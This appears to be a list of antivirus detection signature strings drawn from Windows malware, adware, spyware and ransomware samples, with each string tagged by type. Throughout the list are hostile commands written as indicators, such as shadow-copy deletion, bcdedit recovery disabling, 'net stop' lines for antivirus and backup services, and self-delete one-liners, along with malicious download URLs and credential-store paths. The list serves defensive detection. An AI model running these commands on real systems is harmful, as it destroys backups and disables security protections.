- 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb (PEHSTR)
- WScript.Echo(Encrypt( (PEHSTR)
- POST /interface.asp HTTP/1.1 (PEHSTR)
- User-Agent: (CustomSpy) (PEHSTR)
- GET /qvod.txt HTTP/1.1 (PEHSTR)
- %s\baidu (PEHSTR)
- %s\baidu\%s (PEHSTR)
- 0Projects\xNetInstaller\Release\xNetInstaller.pdb (PEHSTR)
- clcount/count.asp?mac= (PEHSTR)
- SkyMon.exe (PEHSTR)
- ALYac.aye (PEHSTR)
- AyAgent.aye (PEHSTR)
- \systemInfo.ini (PEHSTR)
- DLL.dll (PEHSTR)
- COMResModuleInstance (PEHSTR)
- /c ping localhost -n 3 >> NUL && del (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile (PEHSTR_EXT)
- \Internet Explerer.lnk (PEHSTR_EXT)
- Explorer\DontShowMeThisDialogAgain (PEHSTR_EXT)
- \WinRAR\WinRAR.knl" (PEHSTR_EXT)
- iexplore.exe http://www.pp (PEHSTR_EXT)
- .com (PEHSTR_EXT)
- %s/bserv/bserv.php?%s (PEHSTR_EXT)
- c://2.txt (PEHSTR_EXT)
- spoolcv.exe (PEHSTR_EXT)
- www.msnnetwork.net (PEHSTR_EXT)
- now upgrading.....! (PEHSTR_EXT)
- taskmgre.exe (PEHSTR_EXT)
- taskkill /im (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 (PEHSTR_EXT)
- x9c87vcx987v98cx7v.php?ini= (PEHSTR_EXT)
- POST /x9c87vcx (PEHSTR_EXT)
- .bat (PEHSTR_EXT)
- c:\feji.log (PEHSTR_EXT)
- \pipi_dae_ (PEHSTR_EXT)
- \Happy (PEHSTR_EXT)
- 0123456789hyt.exe (PEHSTR_EXT)
- /verysilent (PEHSTR_EXT)
- \pipi_setup%s%s%s%s_clean_ (PEHSTR_EXT)
- \loaddk.inf (PEHSTR_EXT)
- \run32%d.exe (PEHSTR_EXT)
- \note64.exe (PEHSTR_EXT)
- \notepad32.exe (PEHSTR_EXT)
- %s\notepad%d.exe (PEHSTR_EXT)
- d:\360\360Safe.reg (PEHSTR_EXT)
- 68.68.101.226:777/loading/ (PEHSTR_EXT)
- :777/nhbvyeuds.php (PEHSTR_EXT)
- :251/popopo.php?gg= (PEHSTR_EXT)
- :251/bukuaile.php?df= (PEHSTR_EXT)
- :251/rfrfrfrfrf.php?gg= (PEHSTR_EXT)
- :251/demamacao.php.php?df= (PEHSTR_EXT)
- Server_Crack.rar (PEHSTR)
- \WinH%c%c%c32.exe (PEHSTR)
- C:\Program Files\7rar\ (PEHSTR)
- ico.cab (PEHSTR_EXT)
- url.cab (PEHSTR_EXT)
- \zs.bat (PEHSTR_EXT)
- ukad.com (PEHSTR_EXT)
- /kingsoft.cab (PEHSTR_EXT)
- setup.exe (PEHSTR_EXT)
- http://dl.dropbox.com/ (PEHSTR_EXT)
- /z.jpg (PEHSTR_EXT)
- C:\Progt\ (PEHSTR_EXT)
- C:\ProgFUGI\ (PEHSTR_EXT)
- %MYFILES%\Upd (PEHSTR)
- \Program Files\urlcore.exe /h /r /t /b (PEHSTR_EXT)
- \Internet Explorer.lnk (PEHSTR_EXT)
- \HideDesktopIcons\ClassicStartMenu (PEHSTR_EXT)
- \Tasks\conime.exe (PEHSTR_EXT)
- aaaaaaaaaaaaaaaaaaaaaa.limewebs.com/z/gate.php (PEHSTR_EXT)
- %RootSystem%\hook.dll (PEHSTR)
- //xc.115.bz/tools.exe (PEHSTR)
- \userinit.exe (PEHSTR)
- //a.zz7.in/count.asp (PEHSTR_EXT)
- //tx.xx7.in/a7lm.txt (PEHSTR_EXT)
- taskkill /F /IM %s (PEHSTR_EXT)
- smss.exe|csrss.exe|winlogon.exe|services.exe|svchost.exe (PEHSTR_EXT)
- %APPDATA%\Microsoft\Media Player\DRM128 (PEHSTR_EXT)
- /patch/chkupdate.php (PEHSTR_EXT)
- 222.217.240.30/song/gougou.exe (PEHSTR)
- 222.217.240.30/song/vgauga.exe (PEHSTR)
- 222.217.240.30/song/pison.exe (PEHSTR)
- @rd /f/s/q (PEHSTR_EXT)
- @ping 127.0.0.1 -n 2 (PEHSTR_EXT)
- .win0day.com/ (PEHSTR_EXT)
- Files\update.exe (PEHSTR_EXT)
- \win123b.bat (PEHSTR_EXT)
- del /f /q " (PEHSTR)
- bikfir.dll (PEHSTR)
- k.dilmosofroad.com (PEHSTR)
- http://217.8.117 (PEHSTR_EXT)
- mastergamenameper.club (PEHSTR_EXT)
- browser.exe (PEHSTR_EXT)
- v4.0.30319\thedevilcoder.exe (PEHSTR_EXT)
- Dropbox.Api (PEHSTR_EXT)
- #fasdfgsfsd.dll# (PEHSTR_EXT)
- #fljgaf.dll# (PEHSTR_EXT)
- #f.dgddjkdll# (PEHSTR_EXT)
- http://tj.gogo2021.xyz/ (PEHSTR_EXT)
- \WINDOWS\Temp\MpCz01.tmp (PEHSTR_EXT)
- \TEMP\~1z23.tmp (PEHSTR_EXT)
- passThrough.pdb (PEHSTR_EXT)
- https://buysrilankan.lk/pp/ConsoleApp (PEHSTR_EXT)
- AssemblyCompany (PEHSTR_EXT)
- http://pfsbankgroup.com/ (PEHSTR_EXT)
- .boot (PEHSTR_EXT)
- .JJVQJMA (PEHSTR_EXT)
- C:\Program Files\Common Files\ThinkVantage Fingerprint Software\Drivers\smihlp.sys (PEHSTR_EXT)
- /dumpstatus (PEHSTR_EXT)
- \SystemRoot\system32\BOOTVI (PEHSTR_EXT)
- HTTPWebNode.Agent (PEHSTR_EXT)
- Borland SOAP 1.2 (PEHSTR_EXT)
- ShellExecuteExW (PEHSTR_EXT)
- #fasdfgsfffsd.dll# (PEHSTR_EXT)
- .dgddjkdll# (PEHSTR_EXT)
- \andrq.ini (PEHSTR_EXT)
- Software\Far\Plugin (PEHSTR_EXT)
- \FTP\Hosts (PEHSTR_EXT)
- Software\Ghisler\Total Commander (PEHSTR_EXT)
- SOFTWARE\RIT\The Bat! (PEHSTR_EXT)
- SOFTWARE\Mirabilis\ICQ\DefaultPrefs (PEHSTR_EXT)
- nections\pbk\rasphone.pbk (PEHSTR_EXT)
- \GlobalSCAPE\CuteFTP (PEHSTR_EXT)
- Software\Mail.Ru\Agent\mra_logins (PEHSTR_EXT)
- SOFTWARE\FlashFXP\3 (PEHSTR_EXT)
- \ws_ftp.ini (PEHSTR_EXT)
- http://spotauditor.nsauditor.com (PEHSTR_EXT)
- Change Forgotten Password http://www.change-forgotten-password.com (PEHSTR_EXT)
- http://www.top-password.com/password-recovery-bundle.html (PEHSTR_EXT)
- #fkasdfgffgsfffsd.dll# (PEHSTR_EXT)
- vssadmin Delete Shadows /all /quiet (PEHSTR_EXT)
- vssadmin resize shadowstorage /for=c: /on=c: /maxsize= (PEHSTR_EXT)
- net stop "Sophos Message Router" /y (PEHSTR_EXT)
- net stop "Sophos MCS Client" /y (PEHSTR_EXT)
- net stop "Sophos MCS Agent" /y (PEHSTR_EXT)
- net stop "Sophos Device Control Service" /y (PEHSTR_EXT)
- net stop "Sophos Clean Service" /y (PEHSTR_EXT)
- net stop "Sophos Web Control Service" /y (PEHSTR_EXT)
- net stop "Sophos System Protection Service" /y (PEHSTR_EXT)
- net stop "Sophos Agent" /y (PEHSTR_EXT)
- net stop "Sophos AutoUpdate Service" /y (PEHSTR_EXT)
- net stop "Sophos File Scanner Service" /y (PEHSTR_EXT)
- net stop "Sophos Safestore Service" /y (PEHSTR_EXT)
- net stop "Sophos Health Service" /y (PEHSTR_EXT)
- net stop sophossps /y (PEHSTR_EXT)
- net stop McShield /y (PEHSTR_EXT)
- net stop Antivirus /y (PEHSTR_EXT)
- net stop VeeamDeploymentService /y (PEHSTR_EXT)
- net stop VeeamDeploySvc /y (PEHSTR_EXT)
- net stop VeeamCatalogSvc /y (PEHSTR_EXT)
- Antimalware Service Executable (PEHSTR_EXT)
- SecurityHealth.exe (PEHSTR_EXT)
- #fasfsaf.dll# (PEHSTR_EXT)
- #fasgag.dll# (PEHSTR_EXT)
- #gdfsfds.dll# (PEHSTR_EXT)
- #fsdgdsdsdsd.dll# (PEHSTR_EXT)
- #fasfdddddddddssaf.dll# (PEHSTR_EXT)
- #fasfddddddddssaf.dll# (PEHSTR_EXT)
- #fasfdaaaaaaaadsssaf.dll# (PEHSTR_EXT)
- #gdfsfdllllllls.dll# (PEHSTR_EXT)
- #fasfdddddoklpoddddssaf.dll# (PEHSTR_EXT)
- #fasfdkioioaaaaaaaadsssaf.dll# (PEHSTR_EXT)
- Borland_Protector Cracked v1.0 (PEHSTR_EXT)
- WpfPdfUnblocker.My.Resources (PEHSTR_EXT)
- //github.com/ (PEHSTR_EXT)
- Stealer.exe (PEHSTR_EXT)
- HttpOpenRequestW (PEHSTR_EXT)
- C:\Roaming (PEHSTR_EXT)
- PleaseWait.exe (PEHSTR_EXT)
- C:\Users\PC\Desktop\PleaseWait\PleaseWait\obj\Debug\PleaseWait.pdb (PEHSTR_EXT)
- does not work on your computer (PEHSTR_EXT)
- https://cdn.discordapp.com/attachments/ (PEHSTR_EXT)
- `/File.png (PEHSTR_EXT)
- Windows.Update (PEHSTR_EXT)
- r1c3rstrim/war/ten.nibtxet//:sptth (PEHSTR_EXT)
- #fasfdkioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #gsdggdlllllllokosadsadggggg# (PEHSTR_EXT)
- #fasfdkklljidddddddssaf.dll# (PEHSTR_EXT)
- #gdfsfdlll;;;;llllls.dll# (PEHSTR_EXT)
- https://buysrilankan.lk/k/ConsoleApp (PEHSTR_EXT)
- IKJSUHFNIUFHIUFHIUSFHIUFHIUSFIUSFHIUSFH (PEHSTR_EXT)
- #gsdggdllfsflllllokosadsadggggg# (PEHSTR_EXT)
- #fasffasdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #ijfakkk.dll# (PEHSTR_EXT)
- EfsRpcQueryRecoveryAgents (PEHSTR_EXT)
- PetitPotam.exe (PEHSTR_EXT)
- Xdrsbyaopb.dll (PEHSTR_EXT)
- hquknivslqkb.dll (PEHSTR_EXT)
- C:\Users\LP\Desktop\loader\loader\obj\Debug\loader.pdb (PEHSTR_EXT)
- Vagina.Main (PEHSTR_EXT)
- WindowsFormsApp1.Properties.Resources (PEHSTR_EXT)
- #fasfdsfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #gdfsaffdsflfsafgflllls.dll# (PEHSTR_EXT)
- hjkj.exe (PEHSTR_EXT)
- GPT4_V2.Properties.Resources (PEHSTR_EXT)
- ajwfdaidwa.exe (PEHSTR_EXT)
- jsfeifeofewolf.exe (PEHSTR_EXT)
- WindowsFormsApp1.Properties.Resources.resources (PEHSTR_EXT)
- Revolai.exe (PEHSTR_EXT)
- Sworzy Baba Inc. (PEHSTR_EXT)
- #gsdggdllfsfsdffsflllfgfllokosadsadggggg# (PEHSTR_EXT)
- #fsalluiijuidsfsdfffsdfdsfhfasaf.dll# (PEHSTR_EXT)
- #fafdasgsffsdfdkgfioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #gdfsaffdsffsdfdslfsafgflllls.dll# (PEHSTR_EXT)
- exe.ooc/ac.semohnemul//:sptth (PEHSTR_EXT)
- .ungaina (PEHSTR_EXT)
- .refutab (PEHSTR_EXT)
- .implume (PEHSTR_EXT)
- .turbody (PEHSTR_EXT)
- .calvini (PEHSTR_EXT)
- .becircl (PEHSTR_EXT)
- +.+3+8 (PEHSTR_EXT)
- #fsalluiijuidsxfsdfffsdfdsfhfasaf.dll# (PEHSTR_EXT)
- #fasvxfdsfsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #ijfakkgffsfvxdsfsgk.dll# (PEHSTR_EXT)
- WMIC.exe shadowcopy delete /nointeractive (PEHSTR_EXT)
- bcdedit.exe /set {default} recoveryenabled No (PEHSTR_EXT)
- bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures wbadmin DELETE SYSTEMSTATEBACKUP wbadmin DELETE (PEHSTR_EXT)
- net stop BackupExecAgentAccelerator /y (PEHSTR_EXT)
- net stop BackupExecAgentBrowser /y (PEHSTR_EXT)
- net stop McAfeeEngineService /y (PEHSTR_EXT)
- \XFXyfwyzu (PEHSTR_EXT)
- \XFHqjfszu (PEHSTR_EXT)
- \MoriAgent\Client\Common\ (PEHSTR_EXT)
- FML.dll (PEHSTR_EXT)
- Default.g.resources (PEHSTR_EXT)
- isfd0sd.exe (PEHSTR_EXT)
- System.Runtime.InteropServices (PEHSTR_EXT)
- cmdaaaasssssssssssssssssssssssssssssssssssssssssssssssssaaaaa.exe (PEHSTR_EXT)
- http://user:password@www.includehelp.com:8082/Article/CPrograms/ (PEHSTR_EXT)
- .Properties.Resources.resources (PEHSTR_EXT)
- lpCmdLine (PEHSTR_EXT)
- test-connection -comp google.com -count 1 -Quiet (PEHSTR_EXT)
- Users\Eng Moha (PEHSTR_EXT)
- _R/y* (PEHSTR_EXT)
- #falkfskgdfgdfgdfgdfgsfkkksxvcxfgffkkuihiodsdgag.dll# (PEHSTR_EXT)
- #fafdasgsffgdfgdfsdfdkgcfioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #fasffssasfdsfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- #ijfakkgffsfdsfvxdsfsgk.dll# (PEHSTR_EXT)
- System.Windows.Forms.Form (PEHSTR_EXT)
- v4.0.30319 (PEHSTR_EXT)
- http://gffggfffffrograms/ (PEHSTR_EXT)
- https://anarchyrsps.live/ (PEHSTR_EXT)
- LINCA.Properties.Resources (PEHSTR_EXT)
- MG.Office.Diagram (PEHSTR_EXT)
- #fasdasdadvxfafdfdsgdfgdffsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #faadasdsffgssasfdsfddfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- integralbd.com/inquiry-cim.jpg (PEHSTR_EXT)
- ZtmbDowZtmbnlZtmboadDZtmbataZtmb (PEHSTR_EXT)
- MotivateDesktop.aspx.ASPX.resources (PEHSTR_EXT)
- MotivateDesktop.Properties.Resources (PEHSTR_EXT)
- GUI_Class.QQQQQ.resource (PEHSTR_EXT)
- //asbit.cn/zipack/full (PEHSTR_EXT)
- cmd.exe /c rmdir /s /q (PEHSTR_EXT)
- uplooder.net/img/image/ (PEHSTR_EXT)
- p.png (PEHSTR_EXT)
- p.jpg (PEHSTR_EXT)
- HttpClient (PEHSTR_EXT)
- Play splitscreen games over the internet (PEHSTR_EXT)
- SplitPlay.Resources.resources (PEHSTR_EXT)
- SplitPlay.My (PEHSTR_EXT)
- FreshFoodExpress.Resources (PEHSTR_EXT)
- LinkMaker.Properties.Resources.resources (PEHSTR_EXT)
- SharpStructures.Sorting.SortHelper (PEHSTR_EXT)
- MyWebeSocket.Properties.Resources.resources (PEHSTR_EXT)
- #fasvxfafdfdsgdfgdffsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #fafdafssggdsffgdfgdfsdfdkgcfioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #ijfakkgdfggffsfdsfvxdsfsgk.dll# (PEHSTR_EXT)
- #sfgds.dll# (PEHSTR_EXT)
- #faaxvdaasdsffgssasfdsfddfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- #fasvddddxdasdadvxfafdfdsgdfgdffsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #afadxvaddadfssffassdddddfgvxcddfgdffssgsf.dll# (PEHSTR_EXT)
- =/.|i (PEHSTR_EXT)
- s:// (PEHSTR_EXT)
- http (PEHSTR_EXT)
- .com (PEHSTR_EXT)
- #faaxvdasdsffgssasfdsfddfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- #afadxvaddadfssffassfgvxcddfgdffssgsf.dll# (PEHSTR_EXT)
- #ijfakdsxaddkgdfggffsfdsfvxdsfsgk.dll# (PEHSTR_EXT)
- System.Resources.Tools.StronglyTypedResourceBuilder (PEHSTR_EXT)
- ).SendMerlinMessage (PEHSTR_EXT)
- net/http.persistConnWriter.Write (PEHSTR_EXT)
- github.com/lucas-clemente (PEHSTR_EXT)
- github.com/marten-seemann (PEHSTR_EXT)
- ).NewSession (PEHSTR_EXT)
- ).RemoteAddr (PEHSTR_EXT)
- ).AddConn (PEHSTR_EXT)
- ).Hostname (PEHSTR_EXT)
- ).Password (PEHSTR_EXT)
- .ClientTaskResponse (PEHSTR_EXT)
- .ServerPostResponse (PEHSTR_EXT)
- .clientSessionState (PEHSTR_EXT)
- ).GetSessionTicket (PEHSTR_EXT)
- AgentInfo) (PEHSTR_EXT)
- .ServerTaskResponse (PEHSTR_EXT)
- ).SessionTicket (PEHSTR_EXT)
- ).SetSessionState (PEHSTR_EXT)
- ).RemoteSock (PEHSTR_EXT)
- Cradiator.Properties.Resources.resources (PEHSTR_EXT)
- Cradiator.Config.ChangeHandlers (PEHSTR_EXT)
- Kora.Visual (PEHSTR_EXT)
- addddddf.exe (PEHSTR_EXT)
- /c ping yahoo.com (PEHSTR_EXT)
- transfer.sh (PEHSTR_EXT)
- Qhpap.Properties.Resources (PEHSTR_EXT)
- 0mc-global.com (PEHSTR_EXT)
- SOFTWARE\CommonName\Toolbar (REGKEY)
- Software\Classes\babeie.helper (REGKEY)
- Software\Classes\winnet.update (REGKEY)
- software\classes\winnet.update (REGKEY)
- Software\Classes\babeie.agentie (REGKEY)
- Software\Classes\babeie.handler (REGKEY)
- Software\Classes\babie.helper.1 (REGKEY)
- Software\Classes\cnbar.bandsink (REGKEY)
- Software\Classes\gigexagent.gigexctrl (REGKEY)
- SOFTWARE\Classes\GigexAgent.GigexCtrl (REGKEY)
- Software\Classes\gigexagent.gigexctrl.1 (REGKEY)
- SOFTWARE\Classes\GigexAgent.GigexCtrl.1 (REGKEY)
- Software\Classes\vxpspeeddelivery.download (REGKEY)
- Software\Classes\vxpspeeddelivery.download.1 (REGKEY)
- http://www.look2me.com/ (PEHSTR_EXT)
- CLSID\%s\Implemented Categories\{00021492-0000-0000-C000-000000000046} (PEHSTR_EXT)
- www.ad-w-a-r-e.com (PEHSTR_EXT)
- www.a-d-w-a-r-e.com (PEHSTR_EXT)
- http://%s/AD/UCMD? (PEHSTR_EXT)
- http://%s/AD/CMD? (PEHSTR_EXT)
- ad-w-a-r-e.com (PEHSTR_EXT)
- rmvtrjan.exe (PEHSTR_EXT)
- trupd.exe (PEHSTR_EXT)
- simplysup.com (PEHSTR_EXT)
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\Desktop (PEHSTR_EXT)
- CLSID\{DDFFA75A-E81D-4454-89FC-B9FD0631E725} (PEHSTR_EXT)
- %smsg%d.dll (PEHSTR_EXT)
- www.nictechnetworks.com/eula.html By continuing to use the SOFTWARE PRODUCT after the EULA is (PEHSTR_EXT)
- ADWARE application\Core\Dev\Installer\Release\Install.pdb (PEHSTR_EXT)
- \msg1*.dll (FILEPATH)
- ,software\microsoft\internet explorer\toolbar (PEHSTR)
- /http://%s/search/search.cgi?src=autosearch&s=%s (PEHSTR)
- Software\%s (PEHSTR)
- 1.2.1 (PEHSTR)
- http://upd.lop.com/upd/check (PEHSTR_EXT)
- http://upd.zone-media.com/upd/check (PEHSTR_EXT)
- You must install this software as part of the parent program. Press OK to exit. (PEHSTR_EXT)
- \veg32.dll (FILEPATH)
- \plg_ie0.dll (FILEPATH)
- \b_dnserr.gif (FILEPATH)
- \i_dnserr.gif (FILEPATH)
- \r_dnserr.gif (FILEPATH)
- \s_dnserr.gif (FILEPATH)
- \donk_bar.dll (FILEPATH)
- \lopsearch.exe (FILEPATH)
- \frsezaeaav.dll (FILEPATH)
- \nshelstpgl.dll (FILEPATH)
- HookWatch.GetMouseMessage (PEHSTR)
- blue-series.de (PEHSTR)
- google.cn/search? (PEHSTR)
- gameyes.com (PEHSTR)
- IEHelper.dll (PEHSTR)
- ISoftware\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects (PEHSTR)
- google.com (PEHSTR)
- repl.dll (PEHSTR)
- pSoftware\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489} (PEHSTR)
- baiduba.DLL (PEHSTR_EXT)
- C:\WINDOWS\system32\ieset.ini (PEHSTR_EXT)
- www.131377.com?accect (PEHSTR_EXT)
- asiafind.com/go/g (PEHSTR_EXT)
- shop.7cv.com/index.php?asstfrom= (PEHSTR_EXT)
- cnt.zhaopin.com/Market/whole_counter.jsp?sid= (PEHSTR_EXT)
- f=http://www.netxboy.com/ (PEHSTR_EXT)
- http://go.58.com/?f= (PEHSTR_EXT)
- http://www.now.cn/?SCPMCID= (PEHSTR_EXT)
- www.joyo.com/default.asp?source=ad4all (PEHSTR_EXT)
- \.\PhysicalDrive%d (PEHSTR)
- TakeKeywordScreenshot (PEHSTR)
- AgentSettings.CaptureKeyStrokes (PEHSTR)
- 0mail.google.com (PEHSTR_EXT)
- 0/owa/auth/owaauth.dll (PEHSTR_EXT)
- 0mail.yahoo. (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\EventLog\Application\ (PEHSTR_EXT)
- AgentSettings.CaptureKeyStrokes (PEHSTR_EXT)
- TakeKeywordScreenshot (PEHSTR_EXT)
- FACEBOOK_HTTP (PEHSTR_EXT)
- MYSPACE_HTTP (PEHSTR_EXT)
- \\.\pipe\SpectorLiveLog (PEHSTR_EXT)
- \netknl.dll (FILEPATH)
- \abfrnex.dll (FILEPATH)
- \mstfgher.dll (FILEPATH)
- \msurlbot.dll (FILEPATH)
- \netknlhm.dll (FILEPATH)
- \windows\lsass.exe (PEHSTR)
- SPYAGENT@ (PEHSTR)
- SpyAgent_HWND32 (PEHSTR_EXT)
- %s\saopts.dat (PEHSTR_EXT)
- Spytech SpyAgent (PEHSTR_EXT)
- \spytech software\spyagent\spyagent.exe (FILEPATH)
- \spytech spyagent (FOLDERNAME)
- \programs\spytech spyagent (FOLDERNAME)
- \spytech software\spyagent (FOLDERNAME)
- \spytech software\spytech spyagent (FOLDERNAME)
- \spytech software\spyagent professional (FOLDERNAME)
- software\microsoft\windows\currentversion\uninstall\spytech spyagent (REGKEY)
- software\microsoft\windows\currentversion\uninstall\spytech spyagent professional (REGKEY)
- \spytech software\spytech spyagent\deploy.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\svchost.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\sysdiag.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\nostealth.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\driver-setup.exe (ASEP_FILEPATH)
- SOFTWARE\KMiNT21\PersonalDesktopSpy (REGKEY)
- \jpbkf.dll (FILEPATH)
- \vtlbar1.dll (FILEPATH)
- \cleanup2.bat (FILEPATH)
- \bundles (FOLDERNAME)
- Software\Classes\Tubby.ToolBandObj.1 (REGKEY)
- Software\Classes\clsid/{5D31B21C-2DD3-002A-8222-5E27B691B9C2} (REGKEY)
- \hpdll\hpdll.exe (ASEP_FILEPATH)
- \1aypvrv9\grip.dll (ASEP_FILEPATH)
- \09skpome\09skpome.dll (ASEP_FILEPATH)
- \1aypvrv9\1aypvrv9.dll (ASEP_FILEPATH)
- \1aypvrv9\1aypvrv9.exe (ASEP_FILEPATH)
- \1aypvrv9\61127029.exe (ASEP_FILEPATH)
- \1aypvrv9\bcd77dt3.dll (ASEP_FILEPATH)
- \u1qpdqfc\u1qpdqfc.dll (ASEP_FILEPATH)
- \common~1\wrio\wrioa.exe (ASEP_FILEPATH)
- \common~1\wrio\wriol.exe (ASEP_FILEPATH)
- \common~1\wrio\wriom.exe (ASEP_FILEPATH)
- \common~1\wrio\wriop.exe (ASEP_FILEPATH)
- \autoupdate\autoupdate.exe (ASEP_FILEPATH)
- \internet explorer\iuvitlvl.exe (ASEP_FILEPATH)
- C:\TEMP\_checktemptest (PEHSTR_EXT)
- %s\_checktemptest (PEHSTR_EXT)
- %s\Application Data\Microsoft\ (PEHSTR_EXT)
- MACHINE\Software\Classes\CLSID\{16 (PEHSTR_EXT)
- 770A0-0E87-4278-B748-2460D64A8386}\InprocServer32 (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{16 (PEHSTR_EXT)
- IEHelper%d%d%d_%s.dll (PEHSTR_EXT)
- client.yiqilai.com:1207 (PEHSTR_EXT)
- login.yiqilai.com:1207 (PEHSTR_EXT)
- request.yiqilai.com:1207 (PEHSTR_EXT)
- Software\Classes\CLSID\{16A770A0-0E87-4278-B748-2460D64A8386}\InprocServer32 (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{16A770A0-0E87-4278-B748-2460D64A8386} (PEHSTR_EXT)
- \sdastro (FOLDERNAME)
- \lljagent (FOLDERNAME)
- \microsoft\iehelper (FOLDERNAME)
- \common files\smartde (FOLDERNAME)
- Software\SDAstro (REGKEY)
- TAPI32.DLL (PEHSTR_EXT)
- StartDispatchEXEProcess (PEHSTR_EXT)
- %s PID:%d EXE:"%s" (PEHSTR_EXT)
- SOFTWARE\Casiop (PEHSTR_EXT)
- >Link Uninstall</a> (PEHSTR_EXT)
- \disinstalla.htm (PEHSTR_EXT)
- %s%i.bat (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones (PEHSTR_EXT)
- Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Trust Database\0 (PEHSTR_EXT)
- cmdline: %s, _ShowAgr=%d, _Autost=%d (PEHSTR_EXT)
- Mi sto disconnettendo... (PEHSTR_EXT)
- %s %s %d %s [T%dT].url (PEHSTR_EXT)
- Non riesco a creare la phonebook entry. (modem:%s) Errore %ld (PEHSTR_EXT)
- %s /astart (PEHSTR_EXT)
- Impossibile connettersi. Assenza di linea. Controllare che il modem sia acceso e connesso. (PEHSTR_EXT)
- Nessun Modem Rilevato. Controllare e riprovare. (PEHSTR_EXT)
- Nessun Dispositivo Rilevato o Errore. Controllare e riprovare. (PEHSTR_EXT)
- Errore nel rilascio del certificato di attivazione. Transazione abortita. Nessun addebito verra' effettuato. (PEHSTR_EXT)
- Riprova... (PEHSTR_EXT)
- C:\\sgrunt (PEHSTR_EXT)
- disinstalla.htm (PEHSTR_EXT)
- IE4321.exe (PEHSTR_EXT)
- www.sgrunt.biz/ (PEHSTR_EXT)
- \version\NvsvSys.exe (PEHSTR_EXT)
- uninstall@securize.biz (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\TTunim (PEHSTR_EXT)
- .com/index2.php (PEHSTR_EXT)
- archiviosex.com (PEHSTR_EXT)
- archiviohard.com (PEHSTR_EXT)
- c:\pass (PEHSTR_EXT)
- ows\CurrentVersion\Internet Settings\ZoneMap\Domains\ (PEHSTR_EXT)
- archiviosex.net (PEHSTR_EXT)
- sexvideopro.com (PEHSTR_EXT)
- /ccRandom/? (PEHSTR_EXT)
- /members/index2.php? (PEHSTR_EXT)
- 0\Microsoft\Internet Explorer\Quick Launch\ (PEHSTR_EXT)
- c:\Projects\SmartKeystrokeRecorder (PEHSTR)
- SmartMonitorAgent_WindowClass_ (PEHSTR)
- SmartMonitorAgent_v1_0 (PEHSTR)
- SmartKeystrokeRecorder.chm::/html/ (PEHSTR)
- skr.exe (PEHSTR)
- ,Are you sure you want to delete screenshots? (PEHSTR)
- $smartkeystrokerecorder.com/order.htm (PEHSTR)
- \smart keystroke recorder.lnk (FILEPATH)
- \smart keystroke recorder (FOLDERNAME)
- Software\Smart Keystroke Recorder (REGKEY)
- Software\microsoft\windows\currentversion\uninstall\Smart Keystroke Recorder_is1 (REGKEY)
- \sahimages (FOLDERNAME)
- software\vgroup (REGKEY)
- SOFTWARE\VGroup\SAHAgent (REGKEY)
- SOFTWARE\VGroup\SAHPopup (REGKEY)
- SOFTWARE\Classes\WEBInstaller.execute (REGKEY)
- SOFTWARE\Classes\WEBInstaller.execute.1 (REGKEY)
- software\winsock2\layered provider sample (REGKEY)
- Software\microsoft\windows\currentversion\uninstall\f3uor8hs (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopAtHomeSelect Agent (REGKEY)
- software\microsoft\windows\currentversion\uninstall\shopathomeselect agent (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{5F3B3060-09E0-44C6-86F7-BC7B02B57BEE} (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E9670165-86FE-4C34-8C4B-D3158DDC5D92} (REGKEY)
- software\microsoft\code store database\distribution units\{30402ff4-3e71-4a1c-9b4b-1cd3486a9fb2} (REGKEY)
- L.DLL (PEHSTR)
- DllCanUnloadNow (PEHSTR)
- DllGetClassObject (PEHSTR)
- DllUnregisterServer (PEHSTR)
- ObtainUserAgentString (PEHSTR)
- +live. (PEHSTR)
- rds.yahoo. (PEHSTR)
- yahoo. (PEHSTR)
- google. (PEHSTR)
- E404.e404mgr (PEHSTR)
- e404 1.0 Type LibraryW (PEHSTR_EXT)
- e404.DLL (PEHSTR_EXT)
- Software\Classes\E404.e404mgr (REGKEY)
